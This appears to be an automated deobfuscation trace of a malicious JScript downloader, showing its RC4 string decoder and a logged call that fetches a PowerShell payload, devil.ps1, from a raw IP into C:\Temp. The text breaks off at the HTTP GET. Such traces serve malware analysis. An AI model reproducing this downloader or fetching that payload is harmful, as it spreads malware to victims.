                                                                                                                                            • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                            • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                            • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                            • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                            • a() ➔ iCoHWQ95euBdJSkIhmoIxSoo,s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU
                                                                                                                                            • a() ➔ s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU,iCoHWQ95euBdJSkIhmoIxSoo
                                                                                                                                            • a() ➔ s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU,iCoHWQ95euBdJSkIhmoIxSoo
                                                                                                                                            • a() ➔ s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU,iCoHWQ95euBdJSkIhmoIxSoo
                                                                                                                                            • a() ➔ s1vsiGzsWR3dOCkSW4hdKmki,nsPZWRmVDmojW6iZsW,WQriW7T3D8oCjtOdWPyMa8kY,WR3dI8klW6hcKa,WPZcONOXqmoDWQ4zFuqa,nhHpExzOuW,u3rHDhvZ,ug93zxjtAgvSBcaTtM9qCM9MAwXLic1fEgvJDxrPB25qB2XPy3KGuMvTB3rLu2LNBMvKic1gAwXLia,ndGYmuT5ugLpqG,qZPCvgvTCfXxvfjuuLDgu0HtlNbZmq,q3jLyxrLt2jQzwn0,W53dRCoWvG,wCoIWP8znCoXehRdV8k0aCoByG,rMfPBgvKihrVigv4zwn1DguGug93zxjtAgvSBcbZy3jPChq6ia,bSo1W4W,WOtcGSkzW6O4W4NdS8kjncddJefj,W4mtWRdcPeVdTwiGure,W6iXEKqyW58,W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC,nte0ndeXmKDIreTkDa,W57dGCkTW6ZcG8oEW48,fvbPW519D0G7W73dHrZdJa,W50PWR7dL8oGFSkGimoHkG,v1nJCMLWDc5tAgvSBa,Ahr0CdOVlZe3nI42ns4XndqUmY9KzxyVzgv2AwWUChmX,vMtcJeFcKhtdUa7cG8kCpbTh,pLP2W4P5yMG,mZHLEwnXu3G,WRtdPmoQkGOLgX7dSZ/cHG,c8k1s8k5ASkEW5P4fmoVWONdJrW,mte0nZnJuuDNt0O,f8kJBKq,uNvU,WRtdULiuW6XpmmopWQujWQBcN0jAW7xcMCkUB0FcR8kjWOTAWO/cI8oy,oglcUxpcM8ocWRzJW4O7WOxdVbvt,wbSaW6/cIW,nfn9c8ocWOiqEWddGSkU,iCoHWQ95euBdJSkIhmoIxSoo
                                                                                                                                            • Show all Function Runs
                                                                                                                                            50
                                                                                                                                            return b =
                                                                                                                                              51
                                                                                                                                              function (f, g) {
                                                                                                                                              • b(520,"!fnS") ➔ ">\xbe j\x9c\xb7\xdb\x07-ld\x91\"
                                                                                                                                              • b(512,"xtav") ➔ "O\xaa6AmZ"
                                                                                                                                              • b(530,"Rs1)") ➔ "\xb4\x02\x87 '"
                                                                                                                                              • b(524,"Ggh6") ➔ "\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1"
                                                                                                                                              • b(523,"wBd[") ➔ "\x02VF\xf7\x0b\xd4\xd8\xee\x94w3"
                                                                                                                                              • b(495,"AqLr") ➔ ",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc"
                                                                                                                                              • b(520,"!fnS") ➔ "V\x80\xda\xe7u\xa1K"
                                                                                                                                              • b(512,"xtav") ➔ "{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e"
                                                                                                                                              • b(530,"Rs1)") ➔ "\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U"
                                                                                                                                              • b(524,"Ggh6") ➔ "\xc3\x10\xb1\xa5\x12\xda^\x0ft/G"
                                                                                                                                              • Show all Function Runs
                                                                                                                                              52
                                                                                                                                              f = f - 0x1ee;
                                                                                                                                                53
                                                                                                                                                var h = e[f];
                                                                                                                                                  54
                                                                                                                                                  if ( b['PNfjVi'] === undefined )
                                                                                                                                                    55
                                                                                                                                                    {
                                                                                                                                                      56
                                                                                                                                                      var i = function (n) {
                                                                                                                                                      • i("vMtcJeFcKhtdUa7cG8kCpbTh") ➔ "Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG"
                                                                                                                                                      • i("W6iXEKqyW58") ➔ "\xe21zD\x18\xdf"
                                                                                                                                                      • i("wbSaW6/cIW") ➔ "X\x1b\x00\xef\x8b"
                                                                                                                                                      • i("c8k1s8k5ASkEW5P4fmoVWONdJrW") ➔ "\x0b\xb5K\xb9j\x9e\xdax\x14\xef\x89\xcd\x1c"
                                                                                                                                                      • i("WRtdPmoQkGOLgX7dSZ/cHG") ➔ "\xb4\xe4\xea* %\x1b\x1e\xf3?\x86"
                                                                                                                                                      • i("s1vsiGzsWR3dOCkSW4hdKmki") ➔ "KUR"\x06R\xbd\xe1\xac\xc1\xd0\x88"
                                                                                                                                                      • i("pLP2W4P5yMG") ➔ ">Zv\xcaybh"
                                                                                                                                                      • i("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC") ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                                                                                                      • i("nfn9c8ocWOiqEWddGSkU") ➔ "4S}\x0b\xc2\x82\x10{\x00\xc2\xae"
                                                                                                                                                      • i("mte0nZnJuuDNt0O") ➔ "11473cQGgOJ"
                                                                                                                                                      • Show all Function Runs
                                                                                                                                                      57
                                                                                                                                                      var o = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                                                                                                                                                        58
                                                                                                                                                        var p = '', q = '';
                                                                                                                                                          59
                                                                                                                                                          for ( var r = 0x0, s, t, u = 0x0 ; t = n['charAt'] ( u ++ ) ; ~ t && ( s = r % 0x4 ? s * 0x40 + t : t, r ++ % 0x4 ) ? p += String['fromCharCode'] ( 0xff & s >> ( - 0x2 * r & 0x6 ) ) : 0x0 )
                                                                                                                                                            60
                                                                                                                                                            {
                                                                                                                                                              61
                                                                                                                                                              t = o['indexOf'] ( t );
                                                                                                                                                                62
                                                                                                                                                                }
                                                                                                                                                                  63
                                                                                                                                                                  for ( var v = 0x0, w = p['length'] ; v < w ; v ++ )
                                                                                                                                                                    64
                                                                                                                                                                    {
                                                                                                                                                                      65
                                                                                                                                                                      q += '%' + ( '00' + p['charCodeAt'] ( v ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 );
                                                                                                                                                                        66
                                                                                                                                                                        }
                                                                                                                                                                          67
                                                                                                                                                                          return decodeURIComponent ( q );
                                                                                                                                                                          • decodeURIComponent("%56%64%c2%8c%47%c2%90%74%c3%b8%0e%c2%83%c2%9c%3c%1b%47") ➔ "Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG"
                                                                                                                                                                          • decodeURIComponent("%c3%a2%31%7a%44%18%c3%9f") ➔ "\xe21zD\x18\xdf"
                                                                                                                                                                          • decodeURIComponent("%58%1b%00%c3%af%c2%8b") ➔ "X\x1b\x00\xef\x8b"
                                                                                                                                                                          • decodeURIComponent("%0b%c2%b5%4b%c2%b9%6a%c2%9e%c3%9a%78%14%c3%af%c2%89%c3%8d%1c") ➔ "\x0b\xb5K\xb9j\x9e\xdax\x14\xef\x89\xcd\x1c"
                                                                                                                                                                          • decodeURIComponent("%c2%b4%c3%a4%c3%aa%2a%0a%25%1b%1e%c3%b3%3f%c2%86") ➔ "\xb4\xe4\xea* %\x1b\x1e\xf3?\x86"
                                                                                                                                                                          • decodeURIComponent("%4b%55%52%22%06%52%c2%bd%c3%a1%c2%ac%c3%81%c3%90%c2%88") ➔ "KUR"\x06R\xbd\xe1\xac\xc1\xd0\x88"
                                                                                                                                                                          • decodeURIComponent("%3e%5a%76%c3%8a%79%62%68") ➔ ">Zv\xcaybh"
                                                                                                                                                                          • decodeURIComponent("%c3%96%c2%be%c2%ae%77%4f%09%24%06%c3%81%5e%c2%ac%28%c2%a8%35%c2%8d%c3%aa%c2%95%0e%7d%7c%c3%b1%03%c3%9c%35%5e%c2%b7") ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                                                                                                                          • decodeURIComponent("%34%53%7d%0b%c3%82%c2%82%10%7b%00%c3%82%c2%ae") ➔ "4S}\x0b\xc2\x82\x10{\x00\xc2\xae"
                                                                                                                                                                          • decodeURIComponent("%31%31%34%37%33%63%51%47%67%4f%4a") ➔ "11473cQGgOJ"
                                                                                                                                                                          • Show all Function Runs
                                                                                                                                                                          68
                                                                                                                                                                          };
                                                                                                                                                                            69
                                                                                                                                                                            var m = function (n, o) {
                                                                                                                                                                            • function (f, g).pnaobb("vMtcJeFcKhtdUa7cG8kCpbTh","!fnS") ➔ ">\xbe j\x9c\xb7\xdb\x07-ld\x91\"
                                                                                                                                                                            • function (f, g).pnaobb("W6iXEKqyW58","xtav") ➔ "O\xaa6AmZ"
                                                                                                                                                                            • function (f, g).pnaobb("wbSaW6/cIW","Rs1)") ➔ "\xb4\x02\x87 '"
                                                                                                                                                                            • function (f, g).pnaobb("c8k1s8k5ASkEW5P4fmoVWONdJrW","Ggh6") ➔ "\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1"
                                                                                                                                                                            • function (f, g).pnaobb("WRtdPmoQkGOLgX7dSZ/cHG","wBd[") ➔ "\x02VF\xf7\x0b\xd4\xd8\xee\x94w3"
                                                                                                                                                                            • function (f, g).pnaobb("s1vsiGzsWR3dOCkSW4hdKmki","AqLr") ➔ ",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc"
                                                                                                                                                                            • function (f, g).pnaobb("pLP2W4P5yMG","!fnS") ➔ "V\x80\xda\xe7u\xa1K"
                                                                                                                                                                            • function (f, g).pnaobb("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC","xtav") ➔ "{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e"
                                                                                                                                                                            • function (f, g).pnaobb("nfn9c8ocWOiqEWddGSkU","Rs1)") ➔ "\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U"
                                                                                                                                                                            • function (f, g).pnaobb("mte0nZnJuuDNt0O","Ggh6") ➔ "\xc3\x10\xb1\xa5\x12\xda^\x0ft/G"
                                                                                                                                                                            • Show all Function Runs
                                                                                                                                                                            70
                                                                                                                                                                            var p = [], q = 0x0, r, t = '';
                                                                                                                                                                              71
                                                                                                                                                                              n = i ( n );
                                                                                                                                                                              • i("vMtcJeFcKhtdUa7cG8kCpbTh") ➔ "Vd\x8cG\x90t\xf8\x0e\x83\x9c<\x1bG"
                                                                                                                                                                              • i("W6iXEKqyW58") ➔ "\xe21zD\x18\xdf"
                                                                                                                                                                              • i("wbSaW6/cIW") ➔ "X\x1b\x00\xef\x8b"
                                                                                                                                                                              • i("c8k1s8k5ASkEW5P4fmoVWONdJrW") ➔ "\x0b\xb5K\xb9j\x9e\xdax\x14\xef\x89\xcd\x1c"
                                                                                                                                                                              • i("WRtdPmoQkGOLgX7dSZ/cHG") ➔ "\xb4\xe4\xea* %\x1b\x1e\xf3?\x86"
                                                                                                                                                                              • i("s1vsiGzsWR3dOCkSW4hdKmki") ➔ "KUR"\x06R\xbd\xe1\xac\xc1\xd0\x88"
                                                                                                                                                                              • i("pLP2W4P5yMG") ➔ ">Zv\xcaybh"
                                                                                                                                                                              • i("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC") ➔ "\xd6\xbe\xaewO $\x06\xc1^\xac(\xa85\x8d\xea\x95\x0e}|\xf1\x03\xdc5^\xb7"
                                                                                                                                                                              • i("nfn9c8ocWOiqEWddGSkU") ➔ "4S}\x0b\xc2\x82\x10{\x00\xc2\xae"
                                                                                                                                                                              • i("mte0nZnJuuDNt0O") ➔ "11473cQGgOJ"
                                                                                                                                                                              • Show all Function Runs
                                                                                                                                                                              72
                                                                                                                                                                              var u;
                                                                                                                                                                                73
                                                                                                                                                                                for ( u = 0x0 ; u < 0x100 ; u ++ )
                                                                                                                                                                                  74
                                                                                                                                                                                  {
                                                                                                                                                                                    75
                                                                                                                                                                                    p[u] = u;
                                                                                                                                                                                      76
                                                                                                                                                                                      }
                                                                                                                                                                                        77
                                                                                                                                                                                        for ( u = 0x0 ; u < 0x100 ; u ++ )
                                                                                                                                                                                          78
                                                                                                                                                                                          {
                                                                                                                                                                                            79
                                                                                                                                                                                            q = ( q + p[u] + o['charCodeAt'] ( u % o['length'] ) ) % 0x100, r = p[u], p[u] = p[q], p[q] = r;
                                                                                                                                                                                              80
                                                                                                                                                                                              }
                                                                                                                                                                                                81
                                                                                                                                                                                                u = 0x0, q = 0x0;
                                                                                                                                                                                                  82
                                                                                                                                                                                                  for ( var v = 0x0 ; v < n['length'] ; v ++ )
                                                                                                                                                                                                    83
                                                                                                                                                                                                    {
                                                                                                                                                                                                      84
                                                                                                                                                                                                      u = ( u + 0x1 ) % 0x100, q = ( q + p[u] ) % 0x100, r = p[u], p[u] = p[q], p[q] = r, t += String['fromCharCode'] ( n['charCodeAt'] ( v ) ^ p[( p[u] + p[q] ) % 0x100] );
                                                                                                                                                                                                        85
                                                                                                                                                                                                        }
                                                                                                                                                                                                          86
                                                                                                                                                                                                          return t;
                                                                                                                                                                                                            87
                                                                                                                                                                                                            };
                                                                                                                                                                                                              88
                                                                                                                                                                                                              b['pnaobb'] = m, c = arguments, b['PNfjVi'] = ! ! [];
                                                                                                                                                                                                                89
                                                                                                                                                                                                                }
                                                                                                                                                                                                                  90
                                                                                                                                                                                                                  var j = e[0x0], k = f + j, l = c[k];
                                                                                                                                                                                                                    91
                                                                                                                                                                                                                    return ! l ? ( b['qrjbpx'] === undefined && ( b['qrjbpx'] = ! ! [] ), h = b['pnaobb'] ( h, g ), c[k] = h ) : h = l, h;
                                                                                                                                                                                                                    • function (f, g).pnaobb("vMtcJeFcKhtdUa7cG8kCpbTh","!fnS") ➔ ">\xbe j\x9c\xb7\xdb\x07-ld\x91\"
                                                                                                                                                                                                                    • function (f, g).pnaobb("W6iXEKqyW58","xtav") ➔ "O\xaa6AmZ"
                                                                                                                                                                                                                    • function (f, g).pnaobb("wbSaW6/cIW","Rs1)") ➔ "\xb4\x02\x87 '"
                                                                                                                                                                                                                    • function (f, g).pnaobb("c8k1s8k5ASkEW5P4fmoVWONdJrW","Ggh6") ➔ "\xf9\x94\xce+K'\xd50\x07\x8f\x84\xb6\xb1"
                                                                                                                                                                                                                    • function (f, g).pnaobb("WRtdPmoQkGOLgX7dSZ/cHG","wBd[") ➔ "\x02VF\xf7\x0b\xd4\xd8\xee\x94w3"
                                                                                                                                                                                                                    • function (f, g).pnaobb("s1vsiGzsWR3dOCkSW4hdKmki","AqLr") ➔ ",\x00\xe7\\xa0\x16p\x84x\x19\xbc\xfc"
                                                                                                                                                                                                                    • function (f, g).pnaobb("pLP2W4P5yMG","!fnS") ➔ "V\x80\xda\xe7u\xa1K"
                                                                                                                                                                                                                    • function (f, g).pnaobb("W5BcVSkUD08jjaBdGv7cRcJcQdxcJCoQWPuoFxZdSqpdNdvEWRC","xtav") ➔ "{%\xe2r:\x8c\xdci\xe9U\xc0\xca"\x86\x8a\x1741&\xb5\xe5\xf4\x0ci:\x9e"
                                                                                                                                                                                                                    • function (f, g).pnaobb("nfn9c8ocWOiqEWddGSkU","Rs1)") ➔ "\xd8J\xfa\xeen\xb2\xc1\x0e\xa0\x81U"
                                                                                                                                                                                                                    • function (f, g).pnaobb("mte0nZnJuuDNt0O","Ggh6") ➔ "\xc3\x10\xb1\xa5\x12\xda^\x0ft/G"
                                                                                                                                                                                                                    • Show all Function Runs
                                                                                                                                                                                                                    92
                                                                                                                                                                                                                    }, b ( c, d );
                                                                                                                                                                                                                      93
                                                                                                                                                                                                                      }
                                                                                                                                                                                                                        94
                                                                                                                                                                                                                        function DownloadScript(d, f) {
                                                                                                                                                                                                                        • DownloadScript("http://176.65.144.3/dev/devil.ps1","C:\Temp\WTRTRWFSHS.ps1") ➔ true
                                                                                                                                                                                                                        95
                                                                                                                                                                                                                        var n = k, m = l;
                                                                                                                                                                                                                          96
                                                                                                                                                                                                                          try
                                                                                                                                                                                                                            97
                                                                                                                                                                                                                            {
                                                                                                                                                                                                                              98
                                                                                                                                                                                                                              http['Open'] ( m ( 0x20a, 'Cto7' ), d, ! [] ), http['Send'] ( );
                                                                                                                                                                                                                              • m(522,"Cto7") ➔ "GET"
